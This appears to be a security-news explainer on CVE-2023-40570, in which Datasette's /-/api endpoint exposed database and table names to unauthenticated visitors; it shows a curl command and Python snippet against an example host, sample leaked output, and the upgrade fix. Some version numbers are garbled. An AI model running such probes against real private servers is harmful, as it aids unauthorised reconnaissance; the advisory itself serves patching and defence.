CVE CyberSecurity Database News

CVE-2023-40570 - Datasette’s `/api` Endpoint Leaked Database and Table Names (Explained)

Poster -

Datasette is a high-profile open source tool that helps you explore and publish all kinds of data, from CSVs to massive SQLite archives, right on the web. While that mission is cool, a security vulnerability surfaced that put private information at risk—even for those who thought their data was safe behind authentication. That’s what CVE-2023-40570 is all about.

This post will walk you through what happened, why it was a risk, who was impacted, and how to fix or exploit the issue for learning purposes. Let’s dive right in!

What is CVE-2023-40570?

CVE-2023-40570 is a vulnerability found in Datasette versions from 1. alpha (1.a, 1.a1, 1.a2, 1.a3). If you hosted Datasette online, and you protected it with a login plugin like datasette-auth-passwords, you probably expected your data was safe from public eyes.

Here’s the catch:
Anyone—even if not logged in—could visit the special API explorer endpoint /-/api. This would let them see a list of your database names and table names. Actual data (rows/columns) was *not* exposed, but still, knowing table and database names can help attackers find ways to attack further.

Why Does This Matter?

- Database and table names often reveal a lot: e.g., a table named user_passwords or orders_2022 can give clues about database structure, data purpose, or hints for guessing table access endpoints.
- Reconnaissance: Leaking any internal names makes later attacks (like injection or brute-force attacks) easier.
- Privacy: In sensitive deployments—like internal company data or protected research—just the *names* of datasets might be confidential.

Patched: Datasette 1.a4 and above

The bug lives in the special /api explorer endpoint:

https://your-datasette-server/-/api

This route was introduced to help users discover endpoints—handy, but in authenticated setups, it should be protected.

> CAUTION: Only instances with authentication enabled using a plugin (like datasette-auth-passwords) and exposed online are directly impacted.

Exploiting CVE-2023-40570 (For Ethical Testing)

Suppose a company runs a private Datasette at https://data.example.com, and you know they require logins for access.

How would you discover their database and tables?

Just open your browser or use curl and hit

curl https://data.example.com/-/api

Or, in Python

import requests
response = requests.get('https://data.example.com/-/api')
print(response.text)

Sample output (no login required!)

{
    "databases": [
        {
            "name": "main",
            "tables": [
                "users",
                "orders_2022",
                "projects",
                "internal_notes"
            ]
        },
        {
            "name": "marketing",
            "tables": [
                "contacts",
                "campaigns"
            ]
        }
    ]
}

No password, no login—just the list, plain and simple.

How Was It Fixed?

The patch arrived with Datasette 1.a4. The fix basically blocks all access to the /api explorer endpoint for people who are not authenticated, matching the behavior of the rest of the app.

Now, when you hit /-/api on a patched Datasette instance, you’ll get an authentication error if you’re not logged in.

Note: This does NOT affect the core JSON APIs for reading or writing data (/database/table.json). Those already follow proper auth checks and never leaked table/database names to unauthorized users.

pip install -U datasette

`
- Restart your server after upgrade, to make sure the changes are live.
- Review your access policies:
Even with the fix, audit what you expose online and make sure your secrets (including DB/table names) don’t leak via other plugin endpoints.

---

## References and Further Reading

- GitHub Security Advisory for CVE-2023-40570
- Original Datasette changelog and release notes
- CVE Record at Mitre
- datasette-auth-passwords Plugin

---

## What’s the Takeaway?

Even well-designed, open-source data tools like Datasette can have subtle security bugs. Leaking non-sensitive things—like database and table names—might sound minor, but when combined with other info it can serve as the first crack in your system’s armor.

If you run Datasette anywhere online with authentication enabled, update ASAP, and educate your team: security is about details, not just the data.

Stay safe, stay patched!

---

*Written exclusively for security-minded Datasette users. Share and help others stay secure.*

Timeline

Published on: 08/25/2023 01:15:00 UTC
Last modified on: 08/31/2023 13:50:00 UTC